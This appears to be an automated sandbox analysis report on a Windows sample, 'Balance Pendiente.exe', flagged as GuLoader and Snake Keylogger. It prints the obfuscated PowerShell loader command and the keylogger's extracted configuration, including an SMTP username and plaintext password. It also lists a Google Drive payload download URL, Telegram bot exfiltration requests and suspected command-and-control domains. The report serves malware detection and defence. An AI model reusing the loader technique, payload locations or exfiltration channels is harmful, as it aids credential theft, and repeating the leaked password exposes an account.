Windows Analysis Report
Balance Pendiente.exe

Overview

General Information

Sample name: Balance Pendiente.exe
Analysis ID: 1623448
MD5: e70e71a31781b44f850a39693784ce74
SHA1: ce8cf2dc1b30d5d6870cc3d374c15e1005fdc879
SHA256: a02b56b4c74424b72ae21d4737e822653e68b9762e1aeb313d81bd45abce39e7

Detection

GuLoader, Snake Keylogger
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious PE digital signature
Found suspicious powershell code related to unpacking or dynamic code loading
Initial sample is a PE file and has a suspicious name
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Balance Pendiente.exe (PID: 6592 cmdline: "C:\Users\user\Desktop\Balance Pendiente.exe" MD5: E70E71A31781B44F850A39693784CE74)
    • powershell.exe (PID: 6964 cmdline: "powershell.exe" -windowstyle minimized "$Bibrd=gc -Raw 'C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Crossbeam.Dec122';$Antiodont=$Bibrd.SubString(60335,3);.$Antiodont($Bibrd)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 5660 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware configuration (Snake Keylogger):
{"Exfil Mode": "SMTP", "Username": "federico@extintoresdemir.com", "Password": "s46S2&4+", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
Source | Rule | Description | Author | Strings
00000006.00000002.2993742272.0000000021E86000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000006.00000002.2993742272.0000000021D81000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security |
00000001.00000002.2174295669.000000000A3CE000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
Process Memory Space: msiexec.exe PID: 5660 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: msiexec.exe PID: 5660 | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |

System Summary

Source: Network Connection | Author: frack113 | Data: DestinationIp: 172.217.18.14, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 5660, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49770
Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6964, TargetFilename: C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Balance Pendiente.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell.exe" -windowstyle minimized "$Bibrd=gc -Raw 'C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Crossbeam.Dec122';$Antiodont=$Bibrd.SubString(60335,3);.$Antiodont($Bibrd)", CommandLine: "powershell.exe" -windowstyle minimized "$Bibrd=gc -Raw 'C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Crossbeam.Dec122';$Antiodont=$Bibrd.SubString(60335,3);.$Antiodont($Bibrd)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Balance Pendiente.exe", ParentImage: C:\Users\user\Desktop\Balance Pendiente.exe, ParentProcessId: 6592, ParentProcessName: Balance Pendiente.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Bibrd=gc -Raw 'C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Crossbeam.Dec122';$Antiodont=$Bibrd.SubString(60335,3);.$Antiodont($Bibrd)", ProcessId: 6964, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-25T08:27:43.138773+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49828 | 104.21.96.1 | 443 | TCP
2025-02-25T08:27:45.588203+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49848 | 104.21.96.1 | 443 | TCP
2025-02-25T08:27:46.775686+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49855 | 104.21.96.1 | 443 | TCP
2025-02-25T08:27:41.175108+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49812 | 158.101.44.242 | 80 | TCP
2025-02-25T08:27:42.581340+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49812 | 158.101.44.242 | 80 | TCP
2025-02-25T08:27:43.800116+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49830 | 158.101.44.242 | 80 | TCP
2025-02-25T08:27:35.888216+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49770 | 172.217.18.14 | 443 | TCP
2025-02-25T08:27:53.628181+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.4 | 49905 | 149.154.167.220 | 443 | TCP

AV Detection

Source: 00000006.00000002.2993742272.0000000021D81000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "federico@extintoresdemir.com", "Password": "s46S2&4+", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
Source: C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Balance Pendiente.exe | ReversingLabs: Detection: 37%
Source: C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Balance Pendiente.exe | Virustotal: Detection: 44%
Source: Balance Pendiente.exe | Virustotal: Detection: 44%
Source: Balance Pendiente.exe | ReversingLabs: Detection: 37%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 95.1% probability

Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Balance Pendiente.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49818 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49781 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49905 version: TLS 1.2
Source: C:\Users\user\Desktop\Balance Pendiente.exe | Code function: 0_2_00405E6B FindFirstFileA,FindClose,0_2_00405E6B
Source: C:\Users\user\Desktop\Balance Pendiente.exe | Code function: 0_2_00405427 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405427
Source: C:\Users\user\Desktop\Balance Pendiente.exe | Code function: 0_2_00402647 FindFirstFileA,0_2_00402647
Source: C:\Users\user\Desktop\Balance Pendiente.exe | File opened: C:\Users\user
Source: C:\Users\user\Desktop\Balance Pendiente.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
Source: C:\Users\user\Desktop\Balance Pendiente.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\Balance Pendiente.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Desktop\Balance Pendiente.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows
Source: C:\Users\user\Desktop\Balance Pendiente.exe | File opened: C:\Users\user\AppData\Local\Microsoft
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then jmp 02EDF45Dh 6_2_02EDF2D5
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then jmp 02EDF45Dh 6_2_02EDF4AC
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then jmp 02EDFC19h 6_2_02EDF974

Networking

Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49905 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | HTTP traffic detected (9 requests: 6 with "Connection: Keep-Alive", 3 without):
    GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2025/02/2025%20/%2014:12:39%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
    Host: api.telegram.org
    Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 104.21.96.1
Source: Joe Sandbox View | IP Address: 158.101.44.242
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49830 -> 158.101.44.242:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49812 -> 158.101.44.242:80
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49770 -> 172.217.18.14:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49855 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49848 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49828 -> 104.21.96.1:443
Source: global traffic | HTTP traffic detected:
    GET /uc?export=download&id=1Nzmt_oJLJVDGk7AzLqTg32ZfePDF57a_ HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
    Host: drive.google.com
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    GET /download?id=1Nzmt_oJLJVDGk7AzLqTg32ZfePDF57a_&export=download HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected (10 requests: 7 with "Connection: Keep-Alive", 3 without):
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49818 version: TLS 1.0
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (5 times)
Source: global traffic | DNS traffic detected: DNS query: drive.google.com
Source: global traffic | DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx/1.18.0
    Date: Tue, 25 Feb 2025 07:27:53 GMT
    Content-Type: application/json
    Content-Length: 55
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: msiexec.exe, 00000006.00000002.2993742272.0000000021D81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
Source: msiexec.exe, 00000006.00000002.2993742272.0000000021D81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
Source: msiexec.exe, 00000006.00000002.2993742272.0000000021D81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: msiexec.exe, 00000006.00000002.2993742272.0000000021D81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: powershell.exe, 00000001.00000002.2167965758.0000000006F3B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
Source: Balance Pendiente.exe, Balance Pendiente.exe.1.dr | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Balance Pendiente.exe, Balance Pendiente.exe.1.dr | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000001.00000002.2165973491.00000000057C8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.2160143305.00000000048B6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.2160143305.00000000048B6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000001.00000002.2160143305.0000000004761000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2993742272.0000000021D81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.2160143305.00000000048B6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: msiexec.exe, 00000006.00000002.2993742272.0000000021D81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
Source: powershell.exe, 00000001.00000002.2160143305.00000000048B6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: msiexec.exe, 00000006.00000002.2996723213.0000000023048000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000001.00000002.2160143305.0000000004761000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lBdq
Source: powershell.exe, 00000001.00000002.2160143305.00000000048B6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: msiexec.exe, 00000006.00000002.2993742272.0000000021E62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: msiexec.exe, 00000006.00000002.2993742272.0000000021E62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: msiexec.exe, 00000006.00000002.2993742272.0000000021E62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: msiexec.exe, 00000006.00000002.2993742272.0000000021E62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20a
Source: msiexec.exe, 00000006.00000003.2311914862.0000000006386000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://apis.google.com
Source: msiexec.exe, 00000006.00000002.2996723213.0000000023048000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: msiexec.exe, 00000006.00000002.2996723213.0000000023048000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: msiexec.exe, 00000006.00000002.2996723213.0000000023048000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: msiexec.exe, 00000006.00000002.2993742272.0000000021F40000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2993742272.0000000021F71000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: msiexec.exe, 00000006.00000002.2993742272.0000000021F40000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en4
Source: msiexec.exe, 00000006.00000002.2993742272.0000000021F3B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlBdq
Source: powershell.exe, 00000001.00000002.2165973491.00000000057C8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.2165973491.00000000057C8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.2165973491.00000000057C8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: msiexec.exe, 00000006.00000002.2981936990.00000000062CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/
Source: msiexec.exe, 00000006.00000002.2981936990.00000000062CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/:
Source: msiexec.exe, 00000006.00000002.2981936990.00000000062CA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2992671188.00000000213B0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1Nzmt_oJLJVDGk7AzLqTg32ZfePDF57a_
Source: msiexec.exe, 00000006.00000002.2981936990.00000000062CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1Nzmt_oJLJVDGk7AzLqTg32ZfePDF57a_$
Source: msiexec.exe, 00000006.00000003.2349911508.0000000006381000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981936990.0000000006342000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/
Source: msiexec.exe, 00000006.00000003.2311914862.0000000006386000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2318802167.0000000006348000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981936990.0000000006329000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2349866651.0000000006344000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2349813528.000000000633C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981936990.0000000006342000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1Nzmt_oJLJVDGk7AzLqTg32ZfePDF57a_&export=download
Source: msiexec.exe, 00000006.00000002.2996723213.0000000023048000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: msiexec.exe, 00000006.00000002.2996723213.0000000023048000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: msiexec.exe, 00000006.00000002.2996723213.0000000023048000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000001.00000002.2160143305.00000000048B6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.2167965758.0000000006F3B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ion=v4.5
Source: powershell.exe, 00000001.00000002.2165973491.00000000057C8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: msiexec.exe, 00000006.00000002.2993742272.0000000021DCC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2993742272.0000000021E62000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2993742272.0000000021E3C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
Source: msiexec.exe, 00000006.00000002.2993742272.0000000021DCC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: msiexec.exe, 00000006.00000002.2993742272.0000000021E3C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: msiexec.exe, 00000006.00000002.2993742272.0000000021DF6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2993742272.0000000021E62000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2993742272.0000000021E3C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: msiexec.exe, 00000006.00000003.2311914862.0000000006386000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ssl.gstatic.com
Source: msiexec.exe, 00000006.00000002.2993742272.0000000021E86000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000022ECB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000022E56000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.00000000230FD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000022FFA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000023048000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000022EA4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: msiexec.exe, 00000006.00000002.2996723213.0000000022EA6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000022E5C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000023000000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000022FD5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000022E31000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.00000000230D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
            Source: msiexec.exe, 00000006.00000002.2993742272.0000000021E86000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000022ECB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000022E56000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.00000000230FD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000022FFA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000023048000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000022EA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: msiexec.exe, 00000006.00000002.2996723213.0000000022EA6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000022E5C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000023000000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000022FD5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000022E31000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.00000000230D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
            Source: msiexec.exe, 00000006.00000002.2996723213.0000000023048000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: msiexec.exe, 00000006.00000003.2311914862.0000000006386000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: msiexec.exe, 00000006.00000003.2311914862.0000000006386000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: msiexec.exe, 00000006.00000002.2996723213.0000000023048000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: msiexec.exe, 00000006.00000003.2311914862.0000000006386000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: msiexec.exe, 00000006.00000003.2311914862.0000000006386000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: msiexec.exe, 00000006.00000002.2993742272.0000000021F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
            Source: msiexec.exe, 00000006.00000002.2993742272.0000000021F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/4
            Source: msiexec.exe, 00000006.00000002.2993742272.0000000021F6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lBdq
            Source: unknown | Network traffic detected: HTTP traffic on port 49865 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49865
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49887
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49781
            Source: unknown | Network traffic detected: HTTP traffic on port 49836 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49875 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49781 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49770 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49828 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49818
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49836
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49855
            Source: unknown | Network traffic detected: HTTP traffic on port 49887 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49899
